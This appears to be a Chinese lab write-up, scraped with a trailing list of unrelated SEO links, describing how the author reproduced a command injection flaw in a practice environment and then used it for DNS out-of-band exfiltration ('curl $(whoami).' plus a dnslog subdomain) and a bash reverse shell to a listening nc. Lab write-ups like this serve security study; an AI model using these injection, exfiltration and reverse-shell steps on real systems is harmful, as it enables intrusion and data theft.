当前位置: 首页 > news >正文

南通网站建设公司排名seowhy论坛

南通网站建设公司排名,seowhy论坛,大型建站公司,wordpress cms 中文任务一: 复现环境中的命令注入漏洞。 任务二: 利用命令注入执行whoami,使用DNS外带技术获取结果 任务三:使用反弹shell,将漏洞环境中的shell反弹到宿主机或者vps服务器。 任务一: 1.搭建好环境 2.先去了…

任务一:
复现环境中的命令注入漏洞。
任务二:
利用命令注入执行whoami,使用DNS外带技术获取结果
任务三:使用反弹shell,将漏洞环境中的shell反弹到宿主机或者vps服务器。

任务一:
1.搭建好环境
在这里插入图片描述
在这里插入图片描述
2.先去了解一下这个网站的功能
在这里插入图片描述
在这里插入图片描述
3.首先查看存在的metric,发现在这里是0
在这里插入图片描述
4.我们写入一个metric,首先利用burpsuite进行抓包然后用post请求添加请求体加入metric,然后我们再次查看metrics发现我们已经成功写入一个metric。
在这里插入图片描述
在这里插入图片描述
5.然后进行代码执行漏洞,在tmp下创建一个success文件,得到回显

在这里插入图片描述

在这里插入图片描述
6.然后进入容器中查看(一定要查看创建的文件路径,其他的包含任何的都不是,因为这个找了好久好久,其实很早就做出来了,还以为做错了,无语死了)。

在这里插入图片描述
任务二:
1.直接把输出的whoami重定向到1.txt文件里面(中间要用%20作为空格,不然会失败,因为这个卡了好久,看到burpsuite的颜色那里不对了)

在这里插入图片描述
2.查看1.txt文件,发现我是root。
在这里插入图片描述

3.如果是利用DNS外带技术获得结果的话
首先登入dnslog.cn,然后点击get subdomain获得专属的子域名。
在这里插入图片描述
4.然后使用curl $(whoami).子域名,然后上面回显的时候出现了(root.子域名),得到(这里有一个问题,最开始用的ping,一直没ping通,不知道为啥)
在这里插入图片描述
任务三:
1.用(bash -c “bash -i ·········“)
在这里插入图片描述
2.这里试了很久自己的反弹shell都不成功,然后试了很多次,先是把端口打开了,用ufw添加端口 ufw allow +端口,然后把自己的nc变成了 nc -lvp +端口,然后再sec一次,反弹成功了。
在这里插入图片描述

在这里插入图片描述

http://www.ritt.cn/news/11744.html

相关文章:

  • 中学网上做试卷的网站网站推广
  • 源码屋整站源码seo系统优化
  • 网站开发和网站维护有区别吗哈尔滨最新
  • 深圳永久免费网站建设哪个好百度认证中心
  • 青浦b2c网站制作价格厦门百度推广开户
  • 建设银行官方网站地址排名优化是怎么做的
  • 破解要钱网站肇庆网站推广排名
  • 廊坊网站建设seo推广需要多少钱
  • 今天开始做魔王免费观看网站企业营销策划案例
  • 网站建设视屏八爪鱼磁力搜索引擎
  • 男女上做床全播放网站竞价交易
  • 一对一视频聊天网站开发江苏建站
  • wordpress首页title的调用seo网络推广
  • 唐山建设个网站全网营销推广是什么
  • 灯具设计网站推荐怎么在百度上发广告
  • 网站外部链接添加方式西安百度推广外包
  • 怎么样可以做网站企业邮箱入口
  • 网站建设安全协议百度购物平台客服电话
  • 仿造别人的网站侵权吗成品ppt网站国外
  • 企业网站开发上海韵茵网页设计模板网站
  • 怎么开外贸网店seo关键词推广怎么做
  • 优化网站改版软件培训机构有哪些?哪个比较好
  • 重庆网站seo教程线上推广策略
  • 网页设计最牛的网站建设优网营销
  • 北京html5网站建设网络营销的类型有哪些
  • wordpress设置cdn缓存郑州搜索引擎优化
  • 网上学设计的培训机构吉林seo管理平台
  • 制作公司网站怎么做软文推广系统
  • 企业网站网站建设电话建网站的详细步骤
  • 龙岗网站建设要多少钱网站关键词推广价格